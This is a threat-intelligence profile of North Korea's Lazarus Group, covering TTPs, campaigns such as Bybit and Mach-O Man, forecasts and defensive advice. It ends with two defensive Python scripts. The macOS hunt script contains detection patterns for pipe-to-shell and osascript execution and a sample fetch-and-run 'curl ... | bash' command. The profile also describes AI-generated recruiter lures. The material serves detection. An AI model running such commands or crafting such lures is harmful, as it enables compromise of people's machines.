
G0032

Lazarus Group

Aliases: HIDDEN COBRA · ZINC · Diamond Sleet · Labyrinth Chollima · NICKEL ACADEMY · Guardians of Peace · APT38 · TraderTraitor · Jade Sleet · Slow Pisces · UNC4899

🔴 Active Campaign
State-sponsored · Capability: High · DPRK Reconnaissance General Bureau, 3rd Bureau / North Korea · Rating: B2
Cut-off: May 12, 2026 · TLP:AMBER

Diamond Model


Adversary

DPRK RGB 3rd Bureau · Active since 2009

Infrastructure

Compromised dev workstations · AWS session tokens · Fake recruiter LinkedIn/npm · Operational relay chains

Victim

Crypto exchanges · DeFi · Dev workstations · Defense · Healthcare

Capability

Custom multi-platform malware · macOS Mach-O loaders · Chrome 0-day · AI-assisted social engineering

2026 Crypto Theft Campaign + Mach-O Man

Motive & Objectives

Sanctions-evading revenue generation · Cryptocurrency theft · Strategic espionage · Disruption (politically directed)

Sector Proximity

  • Global telecommunications: Supply-chain pivots via vendors and IdPs

  • Defense technology / high-tech startups: DIB and dual-use IP active target set

  • Venture capital / investment: Portfolio exposure via crypto and defense holdings

  • Government / think tanks: Espionage tasking against policy and DPRK-focus orgs

  • Higher education / research institutions: Aerospace, cryptography, blockchain research targeting

Capability Assessment

  • Tooling: High
  • Persistence: High
  • Attribution evasion: Moderate
  • Zero-days: High

Malware Lineage

AppleJeus · Destover · DarkSeoul · Mach-O Man (macOS loader, 2026) · ClickFix social-engineering kit · Cobalt Strike · Custom Chrome exploit chain

Key TTPs (MITRE ATT&CK)

Initial Access

  • T1566.001 · Spearphishing Attachment: Recruiter-pretext lures with malicious attachments
  • T1566.002 · Spearphishing Link: LinkedIn/Telegram/Discord coding-test domains
  • T1195 · Supply Chain Compromise: Safe{Wallet} dev workstation → Bybit pattern
  • T1189 · Drive-by Compromise: Chrome zero-day via fake gaming site (Feb 2025)

Execution

  • T1204 · User Execution: ClickFix paste-to-terminal social engineering
  • T1059.001 · PowerShell: Encrypted PowerShell loaders
  • T1059.002 · AppleScript: macOS Mach-O Man execution chain

Persistence

  • T1137 · Office Application Startup: Historical Office-based persistence
  • T1543.004 · Launch Daemon: macOS persistence via launch daemons

Defense Evasion

  • T1055 · Process Injection: Custom implants inject into legitimate processes
  • T1497 · Virtualization/Sandbox Evasion: Anti-analysis routines in custom loaders
  • T1036 · Masquerading: Implants masquerade as legitimate developer tools

Credential Access

  • T1539 · Steal Web Session Cookie: AWS session-token theft (Safe{Wallet})
  • T1555.003 · Credentials from Web Browsers: Browser-stored wallet credentials

Discovery

  • T1010 · Application Window Discovery: Standard reconnaissance after execution
  • T1082 · System Information Discovery: Standard reconnaissance after execution
  • T1012 · Query Registry: Windows host reconnaissance

Collection

  • T1005 · Data from Local System: Crypto wallet file collection
  • T1114 · Email Collection: Executive mailbox harvesting

Command and Control

  • T1071 · Application Layer Protocol: Standard HTTPS C2
  • T1583 · Acquire Infrastructure: Operational relay chains and disposable infrastructure

Exfiltration

  • T1041 · Exfiltration Over C2 Channel: Wallet contents exfiltrated over C2

Impact

  • T1657 · Financial Theft: Direct wallet drain and UI-manipulation theft

Victimology

  • Cryptocurrency exchanges and DeFi protocols · Bybit ($1.5B, 2025), KelpDAO ($290M, 2026), Drift, Upbit ($30M, 2025)

  • Blockchain developers and wallet infrastructure · 26,584 wallets exfiltrated from 2,726 dev systems (2026 Q1)

  • Fintech and financial services · Mach-O Man campaign targets executives via business-comms lures

  • Defense industrial base and aerospace · Long-running espionage against weapons design and supply chains

  • Healthcare · Andariel sub-unit funds espionage via Medusa ransomware ops

  • Academic and research institutions · Cryptography, aerospace, and blockchain research targeting

Geographic Focus

United States · South Korea · Japan · European Union · Global (no CIS exclusion observed)

Activity Timeline

  1. 2026-04 B2

    "Mach-O Man" macOS campaign launches: ClickFix paste-to-terminal lures targeting fintech and crypto executives

    Source: CoinDesk / CertiK

  2. 2026-04 B2

    KelpDAO ($290M) and Drift exploits — approximately $500M lifted in two weeks

    Source: UPI / Chainalysis

  3. 2026-02 B2

    Andariel sub-unit deploys Medusa ransomware against US healthcare orgs (espionage funding)

    Source: The Register

  4. 2026-Q1 B2

    26,584 crypto wallets exfiltrated from 2,726 infected developer workstations

    Source: Expel

  5. 2025-11 B2

    Upbit (South Korea): ~$30M in Solana-based assets stolen

    Source: Korean authorities

  6. 2025-02 A1

    **Bybit hack: $1.5B stolen** via Safe{Wallet} supply-chain compromise (largest crypto heist on record); FBI attributes to TraderTraitor sub-cluster

    Source: FBI / NCC Group

  7. 2025-02 B2

    Chrome zero-day distributed via fake gaming site targeting crypto holders

    Source: Picus Security

  8. 2024-10 B2

    AI-assisted tradecraft observed: deepfaked recruiters and LLM-generated lures targeting blockchain developers (Operation DreamJob evolution)

    Source: Expel

  9. 2024-07 A1

    CISA AA24-207A — North Korea global espionage campaign advancing military and nuclear programs

    Source: CISA

  10. 2022-06 A1

    Harmony Horizon Bridge cryptocurrency theft (~$100M) — FBI attribution

    Source: FBI

  11. 2016 A1

    Bangladesh Bank SWIFT heist ($81M) — attributed to APT38 sub-cluster

    Source: Multiple government and vendor reporting

  12. 2014-11 A1

    Sony Pictures destructive wiper attack (Operation Blockbuster)

    Source: Novetta / FBI

Do What (Now What)

  1. Hunt for ClickFix-style paste-to-terminal behavior on engineer endpoints

    Detect anomalous `osascript`, `curl | sh`, and clipboard-sourced terminal execution patterns. Build detection for the macOS-specific Mach-O Man execution chain. Map to MITRE T1204.

  2. Audit third-party signing, multisig, and IdP federation paths

    Inventory AWS session-token lifetimes, identity-provider federation routes, and any vendor with UI-injection capability into transaction approval flows. The Bybit pattern is replicable across any organization with a similar trust topology.

  3. Block and detect DPRK recruiter pretext patterns

    Treat unsolicited LinkedIn, Telegram, and Discord developer-job approaches followed by "technical challenges" on private repos or coding-test domains as indicators of social-engineering targeting. Brief engineering and recruiting teams.

  4. Prioritize macOS EDR coverage and isolation

    Many crypto, fintech, and venture-backed firms are macOS-heavy; legacy AV is insufficient against Mach-O Man-class loaders. Require modern EDR coverage on engineer and executive macOS endpoints, with launch-daemon and AppleScript visibility.

  5. Pre-stage incident-response playbooks for the Bybit pattern

    Build and exercise the developer workstation → cloud session compromise → wallet/UI manipulation kill chain. Tabletop with security, engineering, and finance teams within 30 days. Map detection coverage against MITRE T1195, T1539, and T1657.

Technical Evidence

| Type | Value | First Seen | Last Seen | Confidence |
|---|---|---|---|---|
| CVE | CVE-2024-4947 (Chrome zero-day exploited Feb 2025) | 2025-02 | 2025-02 | MODERATE |
| Tradecraft | ClickFix paste-to-terminal lure pattern (macOS) | 2026-04 | 2026-05 | HIGH |
| Tradecraft | Safe{Wallet} dev workstation → AWS session-token theft → UI injection | 2025-02 | 2025-02 | HIGH |
| Tradecraft | Fake recruiter pretexting via LinkedIn/Telegram/Discord with malicious coding-test repos | 2024-01 | 2026-05 | HIGH |
| Malware family | AppleJeus (trojanized crypto-trading apps) | 2018 | 2026 | HIGH |
| Malware family | Mach-O Man macOS loader | 2026-04 | 2026-05 | MODERATE |

[Data Gap: Publicly disclosed atomic IOCs (domains, IPs, file hashes) for 2026 operations lag the operational pace; consume commercial threat-intel feeds for current atomic indicators rather than relying on this profile.]

Full Analysis

Executive Summary

Intelligence Cut-off Date: 12-May-2026

Lazarus Group is North Korea’s flagship state-sponsored cyber actor, operating under the Reconnaissance General Bureau’s 3rd Bureau and active since at least 2009. The group functions as the regime’s primary sanctions-evasion engine — Chainalysis attributes $6.75 billion in cumulative cryptocurrency theft to DPRK clusters between 2019 and 2025, capped by the $1.5 billion Bybit heist in February 2025 (the largest crypto theft on record) and approximately $500 million lifted from KelpDAO and Drift in April 2026 alone [Source: Chainalysis / Elliptic, Rating: B2]. In parallel, sub-clusters APT38, Andariel, and TraderTraitor conduct strategic espionage against defense, aerospace, and healthcare sectors.

Overall Assessment: [Confidence: HIGH] Lazarus is operationally peer to top-tier APTs but operates with crime-syndicate aggressiveness — a rare combination of nation-state resources, financially urgent regime tasking, and accelerating use of AI-assisted social engineering. The group’s pivot from infrastructure compromise to developer-workstation targeting (Safe{Wallet} → Bybit pattern) is the defining tradecraft shift of the last 18 months.

Identity and Attribution

Lazarus Group is the canonical name for a DPRK state-sponsored cyber umbrella tracked by MITRE as G0032. The group has been variously named HIDDEN COBRA (CISA), ZINC and Diamond Sleet (Microsoft), Labyrinth Chollima (CrowdStrike), NICKEL ACADEMY (Secureworks), and Guardians of Peace (self-assigned during the 2014 Sony Pictures campaign) [Source: MITRE ATT&CK G0032, Rating: A1].

Attribution to the DPRK’s Reconnaissance General Bureau, 3rd Bureau is established by sustained reporting from CISA, NSA, FBI, and major commercial vendors [Source: CISA AA24-207A, Rating: A1]. The “Lazarus Group” label is umbrella-level — the FBI and major vendors track named sub-clusters:

  • APT38 — financially-motivated bank heists (SWIFT-targeting era, 2015–2018).
  • Andariel (Onyx Sleet) — espionage with ransomware monetization, targeting US healthcare and defense.
  • TraderTraitor / Jade Sleet / Slow Pisces / UNC4899 — the 2024–2026 cryptocurrency-theft cluster, formally named by the FBI as the perpetrator of the Bybit hack [Source: FBI Bybit Attribution, Rating: A1].

The boundaries between sub-clusters appear to be functional rather than rigid; shared tooling and infrastructure overlap is observed. Full 2026 cluster-to-cluster overlap mapping is [Single-source].

Motive and Objective

Lazarus operates on a three-motive stack:

Primary — Sanctions-evading revenue generation. Cryptocurrency theft funds the DPRK’s missile and nuclear weapons programs, and is now responsible for an assessed ~76% of all 2026 hack losses across the crypto ecosystem [Source: Chainalysis, Rating: B2]. The 2024 haul alone reached approximately $2.02 billion. This is the dominant operational tempo.

Secondary — Strategic espionage. Defense industrial base, aerospace, semiconductors, blockchain IP, and regime-relevant political intelligence. CISA’s July 2024 advisory documented a global espionage campaign explicitly tied to advancing the regime’s military and nuclear programs [Source: CISA AA24-207A, Rating: A1].

Tertiary — Disruption when politically directed. Historical precedent includes the November 2014 Sony Pictures wiper attack and the 2013 DarkSeoul attacks against South Korean banks and broadcasters. This motive surfaces episodically when regime political tensions spike.

The evolution since 2022 is clear: Lazarus has shifted from infrastructure-level compromise (validator keys, poisoned packages) toward human-targeted social engineering of developers and executives, with the developer’s workstation as the operational fulcrum [Source: Elliptic, Rating: B2].

Victimology

Lazarus operates with a focused but globally distributed target aperture. The bullseye is cryptocurrency exchanges, DeFi protocols, wallet infrastructure, and Web3 developers — confirmed victims in the last 18 months include Bybit (February 2025, $1.5B), Upbit (November 2025, $30M), KelpDAO and Drift (April 2026, ~$500M combined) [Source: TRM Labs / NCC Group / UPI, Rating: B2].

Active target sectors beyond the crypto core: fintech executives (now the primary vector for the Mach-O Man campaign), defense industrial base, aerospace, healthcare (via Andariel’s Medusa ransomware operations in February 2026), and academic research [Source: The Register, Rating: B2].

Geographic targeting is global, with the heaviest concentration in the United States, South Korea, Japan, and the European Union. Unlike Russian-nexus actors, Lazarus shows no observed CIS-country exclusion — geographic constraints appear driven by regime political priorities rather than safe-harbor agreements.

Technology stack targeting has expanded significantly: macOS developer workstations are now a primary target (Mach-O Man loaders, 2026), alongside Chrome (zero-day distributed via fake gaming site, February 2025), AWS session-token theft for multisig signing platforms (Safe{Wallet} → Bybit), and the npm/Telegram/Discord ecosystem for recruiter-pretext lures [Source: CoinDesk / The Hacker News, Rating: B2].

Sector Proximity Assessment:

  • Global telecommunications: Adjacent — exposure is primarily via supply-chain pivots through vendors, identity providers, and multisig services, not direct targeting of carrier infrastructure.
  • Defense technology / high-tech startups: Direct — defense industrial base and dual-use technology IP are core espionage tasking; portfolio companies in this space should assume they are inside the target aperture.
  • Venture capital / investment: Adjacent — portfolio exposure through crypto-adjacent and defense-adjacent holdings; firms themselves are not primary targets but their portfolios sit on the bullseye.
  • Government / think tanks: Adjacent — DPRK-focused policy organizations and military-adjacent research entities are episodic targets for espionage tasking.
  • Higher education / research institutions: Adjacent — cryptography, aerospace, and blockchain research programs are regularly targeted for IP and data theft.

Capability Assessment

Rating: High [Confidence: HIGH]

Lazarus demonstrates sustained nation-state tradecraft across all four capability dimensions tracked in this profile. Custom malware breadth is extensive (AppleJeus, Destover, DarkSeoul, Mach-O Man), persistence routinely runs weeks to months (Safe{Wallet} dev workstation was compromised significantly before Bybit execution), and the group has demonstrated zero-day exploitation capability (Chrome 0-day distributed via fake gaming site, February 2025) [Source: MITRE ATT&CK G0032 / Picus Security, Rating: A1 / B2].

Evidence supporting the HIGH rating:

  • Successful supply-chain compromise of a multisig signing platform (Safe{Wallet} → Bybit, 2025), including bypass of MFA via stolen AWS session tokens and UI injection at signing time [Source: NCC Group, Rating: B2].
  • Cross-platform implant development: Windows, macOS (Mach-O Man loaders, 2026), and Linux build pipelines.
  • Operational sub-unit specialization: APT38 (financial), Andariel (espionage + ransomware), TraderTraitor (crypto) — a structural feature consistent with state resourcing.
  • Patient operational tempo: weeks-to-months dwell time, followed by surgical execution at a single high-value moment.
  • Operationalized AI: since at least October 2024, observed integration of AI-driven techniques into social engineering — deepfaked recruiter video calls, LLM-generated lures, AI-tailored technical “challenges” delivered to engineering targets [Source: Expel, Rating: B2].

OPSEC and attribution evasion are assessed at moderate rather than high — the group’s operations are consistently attributable, and FBI/CISA attribution is rapid. This is consistent with a regime that prioritizes operational throughput over deniability.

Modus Operandi

Key Campaigns

Mach-O Man (April 2026 – present). New macOS-targeted campaign turning routine business communication into a credential-theft and data-loss vector. Targets fintech, crypto, and other high-value executives via the ClickFix social-engineering technique: victims are lured to fake online meetings and instructed to paste a “fix” command into their Mac terminal, granting attackers access to corporate and financial systems [Source: CoinDesk, Rating: B2].

Bybit / Safe{Wallet} supply-chain heist (February 2025). A Safe{Wallet} developer’s workstation was compromised via social engineering, AWS session tokens were stolen to bypass MFA, the multisig signing UI was injected with malicious JavaScript redirecting destination wallets, and Bybit signers approved transactions sending approximately 400,000 ETH and stETH (~$1.5B) to attacker-controlled wallets. FBI attributes to the TraderTraitor sub-cluster [Source: FBI / NCC Group, Rating: A1].
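The session-token step of this chain is the one a defender can audit from cloud logs. As an added example (not from the profile, NCC Group, Safe{Wallet} or any vendor tooling), the audit below runs over constructed CloudTrail-like records: it records where and for how long each temporary credential was issued, flags lifetimes above a policy ceiling, and flags any later use of that credential from a different source IP or client than the one that obtained it. Field names are simplified and the record shape, the 3600-second ceiling and the sample values are assumptions of the example.

```python
"""Audit AWS temporary-credential issuance and use for the Safe{Wallet}-style
session-token theft pattern (T1539) and for over-long session lifetimes.

Added example, not from the profile or from any vendor tooling. Input is a list of
CloudTrail-like records constructed below; only the fields this audit reads are
kept, and the exact shape is an assumption of the example.
"""
from datetime import datetime, timedelta, timezone

MAX_SESSION_SECONDS = 3600  # assumed policy ceiling for engineering roles
ISSUING_EVENTS = {"AssumeRole", "AssumeRoleWithSAML", "AssumeRoleWithWebIdentity",
                  "GetSessionToken"}


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


# Constructed sample: a developer obtains a 12-hour session, uses it normally, then
# the same token is replayed from another network with a different client.
SAMPLE_RECORDS = [
    {"eventTime": "2026-05-01T09:00:00Z", "eventName": "AssumeRole",
     "eventSource": "sts.amazonaws.com", "sourceIPAddress": "203.0.113.10",
     "userAgent": "aws-cli/2.15.0",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev-alice"},
     "requestParameters": {"roleArn": "arn:aws:iam::111122223333:role/frontend-deploy",
                           "durationSeconds": 43200},
     "responseElements": {"credentials": {"accessKeyId": "ASIAEXAMPLE000000001"}}},
    {"eventTime": "2026-05-01T09:05:00Z", "eventName": "PutObject",
     "eventSource": "s3.amazonaws.com", "sourceIPAddress": "203.0.113.10",
     "userAgent": "aws-cli/2.15.0", "userIdentity": {"accessKeyId": "ASIAEXAMPLE000000001"}},
    {"eventTime": "2026-05-01T14:30:00Z", "eventName": "PutObject",
     "eventSource": "s3.amazonaws.com", "sourceIPAddress": "198.51.100.77",
     "userAgent": "Boto3/1.34.0", "userIdentity": {"accessKeyId": "ASIAEXAMPLE000000001"}},
]


def index_sessions(records):
    """Map each issued temporary access key to where, by whom and for how long it was issued."""
    sessions = {}
    for r in records:
        creds = (r.get("responseElements") or {}).get("credentials")
        if r["eventName"] not in ISSUING_EVENTS or not creds:
            continue
        issued = _ts(r["eventTime"])
        duration = r.get("requestParameters", {}).get("durationSeconds", 3600)
        sessions[creds["accessKeyId"]] = {
            "issued": issued, "expires": issued + timedelta(seconds=duration),
            "duration": duration, "ip": r["sourceIPAddress"], "ua": r["userAgent"],
            "role": r.get("requestParameters", {}).get("roleArn", "")}
    return sessions


def audit(records, max_seconds=MAX_SESSION_SECONDS):
    """Return findings: lifetime-policy violations and token use from a new origin."""
    sessions = index_sessions(records)
    findings = []
    for key, s in sessions.items():
        if s["duration"] > max_seconds:
            findings.append({"type": "session_lifetime_exceeds_policy", "key": key,
                             "severity": "medium",
                             "detail": f'{s["duration"]}s > {max_seconds}s for {s["role"]}'})
    for r in records:
        key = r.get("userIdentity", {}).get("accessKeyId")
        if key not in sessions:
            continue  # long-term keys and unknown sessions are out of scope here
        s = sessions[key]
        when = _ts(r["eventTime"])
        if not (s["issued"] <= when <= s["expires"]):
            continue  # STS would have rejected it; nothing to learn
        ip_changed = r["sourceIPAddress"] != s["ip"]
        ua_changed = r["userAgent"] != s["ua"]
        if ip_changed or ua_changed:
            # A user-agent change alone is weak (CLI vs SDK); a new network is not.
            findings.append({"type": "session_token_used_from_new_origin", "key": key,
                             "technique": "T1539",
                             "severity": "high" if ip_changed else "low",
                             "detail": f'{r["eventName"]} from {r["sourceIPAddress"]} '
                                       f'({r["userAgent"]}); issued to {s["ip"]} ({s["ua"]})'})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_RECORDS):
        print(f'[{f["severity"]}] {f["type"]} {f["key"]}: {f["detail"]}')
```

On a real account the same logic runs over an Athena or CloudTrail Lake export; the lifetime finding is the inventory recommendation 2 asks for, the origin finding is the detection.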

KelpDAO + Drift exploits (April 2026). Approximately $500M lifted in two weeks across two DeFi protocols, with preliminary indicators pointing to Lazarus [Source: UPI, Rating: B2].

Developer-targeting campaign (2024–2026). Cumulative exfiltration of 26,584 cryptocurrency wallets from 2,726 infected developer workstations in Q1 2026; the exfiltrated public keys corresponded to wallets holding up to $12M in crypto assets [Source: Expel, Rating: B2].

Historical landmarks. Sony Pictures destructive wiper (Operation Blockbuster, 2014); DarkSeoul (2013); Bangladesh Bank SWIFT heist (2016, attributed to APT38 sub-cluster); Harmony Horizon Bridge theft (2022, FBI-attributed).

MITRE ATT&CK TTPs

| Phase | Technique ID | Technique Name | Notes |
|---|---|---|---|
| Initial Access | T1566.001 | Spearphishing Attachment | Recruiter-pretext lures with malicious attachments |
| Initial Access | T1566.002 | Spearphishing Link | LinkedIn/Telegram/Discord coding-test domains |
| Initial Access | T1195 | Supply Chain Compromise | Safe{Wallet} dev workstation → Bybit pattern |
| Initial Access | T1189 | Drive-by Compromise | Chrome zero-day via fake gaming site (Feb 2025) |
| Execution | T1204 | User Execution | ClickFix paste-to-terminal social engineering |
| Execution | T1059.001 | PowerShell | Encrypted PowerShell loaders |
| Execution | T1059.002 | AppleScript | macOS Mach-O Man execution chain |
| Persistence | T1137 | Office Application Startup | Historical Office-based persistence |
| Persistence | T1543.004 | Launch Daemon | macOS persistence via launch daemons |
| Defense Evasion | T1055 | Process Injection | Custom implants inject into legitimate processes |
| Defense Evasion | T1497 | Virtualization/Sandbox Evasion | Anti-analysis routines in custom loaders |
| Defense Evasion | T1036 | Masquerading | Implants masquerade as legitimate developer tools |
| Credential Access | T1539 | Steal Web Session Cookie | AWS session-token theft (Safe{Wallet}) |
| Credential Access | T1555.003 | Credentials from Web Browsers | Browser-stored wallet credentials |
| Discovery | T1010 | Application Window Discovery | Standard reconnaissance after execution |
| Discovery | T1082 | System Information Discovery | Standard reconnaissance after execution |
| Discovery | T1012 | Query Registry | Windows host reconnaissance |
| Collection | T1005 | Data from Local System | Crypto wallet file collection |
| Collection | T1114 | Email Collection | Executive mailbox harvesting |
| Command and Control | T1071 | Application Layer Protocol | Standard HTTPS C2 |
| Command and Control | T1583 | Acquire Infrastructure | Operational relay chains and disposable infrastructure |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | Wallet contents exfiltrated over C2 |
| Impact | T1657 | Financial Theft | Direct wallet drain and UI-manipulation theft |

Tools and Malware

  • AppleJeus — Long-running trojanized cryptocurrency-trading application family, targeting macOS and Windows users.
  • Destover — Wiper malware used in the 2014 Sony Pictures destructive attack.
  • DarkSeoul — Wiper used in 2013 attacks against South Korean banks and broadcasters.
  • Mach-O Man (2026) — New macOS loader family deployed in the ClickFix-based campaign; turns paste-to-terminal into credential and corporate access compromise.
  • ClickFix social-engineering kit — Lure infrastructure for fake online meeting “fix this” prompts, deployed in 2026.
  • Cobalt Strike — Commodity post-exploitation framework used alongside custom tooling.
  • Custom Chrome exploit chain — Used to weaponize a Chrome zero-day distributed via a fake gaming site in February 2025.

Infrastructure Patterns

Lazarus operates a multi-layered infrastructure model. Front-end lures are hosted on disposable domains (fake recruiter sites, coding-test platforms, fake gaming sites, spoofed Zoom/Teams meeting URLs). Operational relay chains route C2 through compromised legitimate infrastructure to reduce attribution. The 2025 Bybit operation demonstrated abuse of legitimate cloud services (AWS session tokens harvested from a compromised developer workstation), and the group has increasingly leveraged fake LinkedIn/Telegram/Discord recruiter personas combined with malicious npm packages and private coding-test repositories. Full current C2 IP/domain inventory is [Data Gap] — publicly disclosed IOC sets lag the operational pace.

Activity Timeline

| Date | Event | Source | Rating |
|---|---|---|---|
| 2026-04 | “Mach-O Man” macOS campaign launches: ClickFix paste-to-terminal lures targeting fintech and crypto executives | CoinDesk / CertiK | B2 |
| 2026-04 | KelpDAO ($290M) and Drift exploits — approximately $500M lifted in two weeks | UPI / Chainalysis | B2 |
| 2026-02 | Andariel sub-unit deploys Medusa ransomware against US healthcare orgs (espionage funding) | The Register | B2 |
| 2026-Q1 | 26,584 crypto wallets exfiltrated from 2,726 infected developer workstations | Expel | B2 |
| 2025-11 | Upbit (South Korea): ~$30M in Solana-based assets stolen | Korean authorities | B2 |
| 2025-02 | Bybit hack: $1.5B stolen via Safe{Wallet} supply-chain compromise (largest crypto heist on record); FBI attributes to TraderTraitor sub-cluster | FBI / NCC Group | A1 |
| 2025-02 | Chrome zero-day distributed via fake gaming site targeting crypto holders | Picus Security | B2 |
| 2024-10 | AI-assisted tradecraft observed: deepfaked recruiters and LLM-generated lures targeting blockchain developers (Operation DreamJob evolution) | Expel | B2 |
| 2024-07 | CISA AA24-207A — North Korea global espionage campaign advancing military and nuclear programs | CISA | A1 |
| 2022-06 | Harmony Horizon Bridge cryptocurrency theft (~$100M) — FBI attribution | FBI | A1 |
| 2016 | Bangladesh Bank SWIFT heist ($81M) — attributed to APT38 sub-cluster | Multiple government and vendor reporting | A1 |
| 2014-11 | Sony Pictures destructive wiper attack (Operation Blockbuster) | Novetta / FBI | A1 |

Forecast, Implications, and Recommendations

What Next (Forecast)

[Confidence: HIGH] Continued escalation of cryptocurrency theft. Expect $250M+ heists at a pace of at least one per quarter through the remainder of 2026. The DPRK regime’s revenue need is structural, not cyclical, and Lazarus is the principal collection mechanism.

[Confidence: HIGH] macOS targeting expands. The Mach-O Man toolchain will industrialize across Lazarus sub-clusters; macOS-heavy developer and executive populations should expect to see this pattern more, not less.

[Confidence: MODERATE] Deeper supply-chain compromise. Lazarus will continue pursuing multisig and signing services, CI/CD pipelines, and developer identity providers as primary leverage points — the Safe{Wallet} → Bybit model is highly replicable.

[Confidence: MODERATE] AI-personalized social engineering scales. Deepfaked recruiter video calls and LLM-tailored technical lures targeting senior engineers, founders, and CISOs become baseline tradecraft within 12 months.

[Confidence: LOW] A return to disruptive operations against a Western financial institution if regime political tensions spike — the Sony Pictures precedent suggests Lazarus retains this capability and will deploy it when politically directed.

So What (Implications)

Cryptocurrency-adjacent organizations face existential financial exposure. The Bybit pattern demonstrates that a single compromised developer at a third-party vendor can translate into nine-figure losses. Any organization where transaction approval flows through external infrastructure (multisig, signing services, custodians) carries this exposure whether they recognize it or not.

The developer’s workstation is the new perimeter. Lazarus’s strategic shift to social engineering of engineers — fake recruiters, coding tests, ClickFix terminal lures — bypasses traditional perimeter and corporate-IT defenses entirely. Organizations whose security models still center on endpoint and network controls without explicit attention to engineer endpoints and IdP federation are exposed.

macOS is no longer a defensive haven. Many crypto, dev-tool, and venture-backed firms run macOS-heavy environments under the assumption of lower threat density. Mach-O Man invalidates that assumption operationally.

Defense and dual-use IP exposure is direct. Portfolio companies in defense technology and dual-use sensing should assume they are inside Lazarus’s espionage aperture, with regime-driven prioritization of items relevant to DPRK weapons programs.

Now What (Recommendations)

  1. Hunt for ClickFix-style paste-to-terminal behavior on engineer endpoints — Detect anomalous osascript, curl | sh, and clipboard-sourced terminal execution patterns. Build detection for the macOS-specific Mach-O Man execution chain. Map to MITRE T1204.
  2. Audit third-party signing, multisig, and IdP federation paths — Inventory AWS session-token lifetimes, identity-provider federation routes, and any vendor with UI-injection capability into transaction approval flows. The Bybit pattern is replicable across any organization with a similar trust topology.
  3. Block and detect DPRK recruiter pretext patterns — Treat unsolicited LinkedIn, Telegram, and Discord developer-job approaches followed by “technical challenges” on private repos or coding-test domains as indicators of social-engineering targeting. Brief engineering and recruiting teams.
  4. Prioritize macOS EDR coverage and isolation — Many crypto, fintech, and venture-backed firms are macOS-heavy; legacy AV is insufficient against Mach-O Man-class loaders. Require modern EDR coverage on engineer and executive macOS endpoints, with launch-daemon and AppleScript visibility.
  5. Pre-stage incident-response playbooks for the Bybit pattern — Build and exercise the developer workstation → cloud session compromise → wallet/UI manipulation kill chain. Tabletop with security, engineering, and finance teams within 30 days. Map detection coverage against MITRE T1195, T1539, and T1657.
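One way to implement recommendations 1 and 4, as an added example that is not part of the profile or of any EDR vendor's content: a small set of lineage-aware rules run over constructed macOS endpoint telemetry (process-exec and file-write events as dicts; the field names and event shape are this example's assumption, not any product's schema). It flags pipe-to-shell, clipboard-sourced and inline `osascript` execution that descends from a terminal session, flags a LaunchDaemon plist written from that same session, and groups the hits per session so an execution-plus-persistence chain stands out from a lone noisy command.

```python
"""Hunt for ClickFix-style paste-to-terminal chains on macOS engineer endpoints.

Added example: runs a few lineage-aware rules over constructed endpoint telemetry
(process exec and file-write events). The event shape and field names are an
assumption of this example, not any EDR product's schema.
"""
import re
from collections import defaultdict

# Interactive terminal apps: pasted "fix" commands always start under one of these.
TERMINAL_APPS = {"Terminal", "iTerm2", "Warp", "Hyper"}

# (rule name, ATT&CK technique, regex over the full command line)
RULES = [
    ("pipe_remote_script_to_shell", "T1204",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(sh|bash|zsh)\b")),
    ("clipboard_sourced_execution", "T1204",
     re.compile(r"\bpbpaste\b[^|]*\|\s*(sh|bash|zsh|python3?)\b")),
    ("base64_decoded_shell", "T1204",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sh|bash|zsh)\b")),
    ("inline_osascript", "T1059.002",
     re.compile(r"\bosascript\b.*\s-e\s")),
]
LAUNCHD_DIRS = ("/Library/LaunchDaemons/", "/Library/LaunchAgents/")

# Constructed sample telemetry: one paste-to-terminal chain plus benign noise.
# The domain is a placeholder; no real indicator is implied.
SAMPLE_EVENTS = [
    {"type": "exec", "pid": 500, "ppid": 1, "name": "Terminal",
     "cmd": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"type": "exec", "pid": 501, "ppid": 500, "name": "zsh", "cmd": "/bin/zsh -l"},
    {"type": "exec", "pid": 502, "ppid": 501, "name": "bash",
     "cmd": '/bin/bash -c "curl -fsSL https://meeting-fix.example/fix.sh | bash"'},
    {"type": "exec", "pid": 503, "ppid": 502, "name": "osascript",
     "cmd": "osascript -e 'display dialog \"Updating audio driver...\"'"},
    {"type": "file_write", "pid": 502,
     "path": "/Library/LaunchDaemons/com.example.audiofix.plist"},
    {"type": "exec", "pid": 600, "ppid": 1, "name": "softwareupdated",
     "cmd": "/usr/libexec/softwareupdated"},
    {"type": "exec", "pid": 601, "ppid": 501, "name": "git", "cmd": "git pull --rebase"},
]


def build_lineage(events):
    """Map pid -> (process name, parent pid) from exec events."""
    return {e["pid"]: (e["name"], e["ppid"]) for e in events if e["type"] == "exec"}


def terminal_root(pid, procs, max_depth=32):
    """Return the pid of the terminal app above `pid`, or None if there is none."""
    for _ in range(max_depth):
        if pid not in procs:
            return None
        name, ppid = procs[pid]
        if name in TERMINAL_APPS:
            return pid
        pid = ppid
    return None


def hunt(events):
    """Return one alert dict per rule hit, scoped to terminal-descended processes."""
    procs = build_lineage(events)
    alerts = []
    for e in events:
        root = terminal_root(e["pid"], procs)
        if root is None:
            continue  # background daemons never carry a pasted command
        if e["type"] == "exec":
            for rule, technique, rx in RULES:
                if rx.search(e["cmd"]):
                    alerts.append({"rule": rule, "technique": technique, "pid": e["pid"],
                                   "session": root, "evidence": e["cmd"]})
        elif e["type"] == "file_write" and e["path"].startswith(LAUNCHD_DIRS):
            # Persistence dropped from the same interactive session (T1543.004).
            alerts.append({"rule": "launchd_plist_from_terminal_session",
                           "technique": "T1543.004", "pid": e["pid"],
                           "session": root, "evidence": e["path"]})
    return alerts


def chains(alerts, min_techniques=2):
    """Group alerts by terminal session; a session with several distinct techniques
    (execution plus persistence, say) is the Mach-O Man-style chain to escalate."""
    by_session = defaultdict(set)
    for a in alerts:
        by_session[a["session"]].add(a["technique"])
    return {s: sorted(t) for s, t in by_session.items() if len(t) >= min_techniques}


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for a in found:
        print(f'[{a["technique"]}] {a["rule"]} pid={a["pid"]}: {a["evidence"]}')
    print("escalate:", chains(found))
```

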